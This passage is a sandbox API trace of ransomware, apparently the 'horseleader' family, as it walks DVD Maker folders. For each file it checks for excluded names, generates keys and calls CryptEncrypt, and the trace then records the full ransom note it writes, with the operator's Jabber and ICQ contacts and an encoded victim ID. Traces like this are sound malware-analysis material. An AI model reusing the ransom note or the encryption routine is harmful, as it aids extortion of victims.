dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.869] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71deeca7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71deeca7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50add351, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x189f26, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.869] lstrcmpiW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.869] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 91 [0251.869] StrStrIW (lpFirst="SportsMainToScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground_PAL.wmv", 
lpString2="#Decrypt#.txt") returned 1 [0251.869] lstrcmpW (lpString1="SportsMainToScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.869] lstrlenW (lpString=".testttjffg") returned 11 [0251.870] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.870] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.870] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.870] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713aae96, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x713aae96, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x514fb049, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6680f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.870] lstrcmpiW (lpString1="SportsNotesBackground.wmv", lpString2="Windows") returned -1 [0251.870] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 80 [0251.870] StrStrIW (lpFirst="SportsNotesBackground.wmv", 
lpSrch=".horseleader") returned 0x0 [0251.870] lstrcmpW (lpString1="SportsNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.870] lstrcmpW (lpString1="SportsNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.870] lstrlenW (lpString=".testttjffg") returned 11 [0251.870] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.870] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.870] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.871] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71501adb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71501adb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5206f98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x673c74, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.871] lstrcmpiW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.871] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") 
returned 84 [0251.871] StrStrIW (lpFirst="SportsNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.871] lstrcmpW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.871] lstrcmpW (lpString1="SportsNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.871] lstrlenW (lpString=".testttjffg") returned 11 [0251.871] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.871] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.871] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.871] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.873] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x716a49da, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x716a49da, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x522f70cd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca474, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.873] lstrcmpiW (lpString1="SportsScenesBackground.wmv", lpString2="Windows") returned -1 [0251.873] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 81 [0251.873] StrStrIW (lpFirst="SportsScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.873] lstrcmpW (lpString1="SportsScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.873] lstrcmpW (lpString1="SportsScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.873] lstrlenW (lpString=".testttjffg") returned 11 [0251.873] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.874] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.874] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.874] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71789208, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71789208, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x524e6293, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e59f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.874] lstrcmpiW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.874] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 85 [0251.874] StrStrIW (lpFirst="SportsScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.874] lstrcmpW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.874] lstrcmpW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.874] lstrlenW (lpString=".testttjffg") returned 11 [0251.874] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.874] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.874] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.874] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 1 [0251.874] lstrcmpiW 
(lpString1="sports_disc_mask.png", lpString2="Windows") returned -1 [0251.874] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png") returned 75 [0251.875] StrStrIW (lpFirst="sports_disc_mask.png", lpSrch=".horseleader") returned 0x0 [0251.875] lstrcmpW (lpString1="sports_disc_mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.875] lstrcmpW (lpString1="sports_disc_mask.png", lpString2="_uninstalling_.png") returned 1 [0251.875] lstrlenW (lpString=".testttjffg") returned 11 [0251.875] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", lpSrch=".testttjffg") returned 0x0 [0251.875] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.875] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.875] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 0 [0251.875] 
FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.876] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\#Decrypt#.txt") returned 68 [0251.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.878] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.878] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.879] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.879] WriteFile (in: hFile=0x158, 
lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.879] CloseHandle (hObject=0x158) returned 1 [0251.879] GetProcessHeap () returned 0x780000 [0251.879] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.879] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stacking", cAlternateFileName="")) returned 1 [0251.879] lstrcmpiW (lpString1="Stacking", lpString2="Windows") returned -1 [0251.879] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 56 [0251.880] lstrcmpW (lpString1="Stacking", lpString2=".") returned 1 [0251.880] lstrcmpW (lpString1="Stacking", lpString2="..") returned 1 [0251.880] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.880] GetProcessHeap () returned 0x780000 [0251.880] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.880] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*") returned 58 [0251.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.883] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.883] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\.") returned 58 [0251.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.883] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.883] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.883] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\..") returned 59 [0251.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.884] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x540920df, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.884] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.884] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png") returned 74 [0251.884] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.884] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.884] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.884] lstrlenW (lpString=".testttjffg") returned 11 [0251.884] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.884] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.884] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.884] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f71a8d6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f71a8d6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5396df3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, 
nFileSizeLow=0x1928, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0251.884] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="Windows") returned -1 [0251.884] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png") returned 75 [0251.884] StrStrIW (lpFirst="1047x576_91n92.png", lpSrch=".horseleader") returned 0x0 [0251.884] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="#Decrypt#.txt") returned 1 [0251.884] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="_uninstalling_.png") returned 1 [0251.885] lstrlenW (lpString=".testttjffg") returned 11 [0251.885] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpSrch=".testttjffg") returned 0x0 [0251.885] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.885] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.885] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, 